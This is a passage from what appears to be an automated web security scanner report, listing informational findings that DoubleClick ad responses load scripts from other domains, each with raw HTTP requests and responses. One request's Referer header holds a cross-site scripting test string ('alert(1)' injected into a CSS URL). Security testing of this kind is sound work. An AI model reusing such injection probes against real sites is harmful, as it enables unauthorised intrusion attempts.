Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6328

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 14:04:00 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5112048

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.12. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.TribalFusion.com/B5132291.17

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3740.TribalFusion.com/B5132291.17;sz=728x90;click=http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=1186282371? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 16:41:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5415

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.10

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401740&migRandom=6953850&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740"></script>
...[SNIP]...

18.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.10

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:14:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5295

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=4908100&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349"></script>
...[SNIP]...

18.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5224
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40401508&migRandom=4959045&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40401508"></script>
...[SNIP]...

18.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5221

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087444;234174383;40400763&migRandom=7532183&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40400763"></script>
...[SNIP]...

18.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000753541/mnum=0000950190/cstr=59127172=_4d433bca,0085444835,753541_950190_81_0,1_/xsxdata=$XSXDATA/bnum=59127172/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1687741401? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40401586&migRandom=7509933&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40401586"></script>
...[SNIP]...

18.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=96618366=_4d435ebd,0063835233,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=96618366/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1419206302? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:26:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5225

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;40400793&migRandom=8067481&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=40400793"></script>
...[SNIP]...

18.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.6

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 00:22:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5016

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087449;234174509;39969205&migRandom=7819559&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205"></script>
...[SNIP]...

18.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=66356808=_4d43675c,7437264561,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=66356808/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2037650882? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5222

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=1887560&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

18.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5215

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
p://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=7510980&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

18.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:06:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5008

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
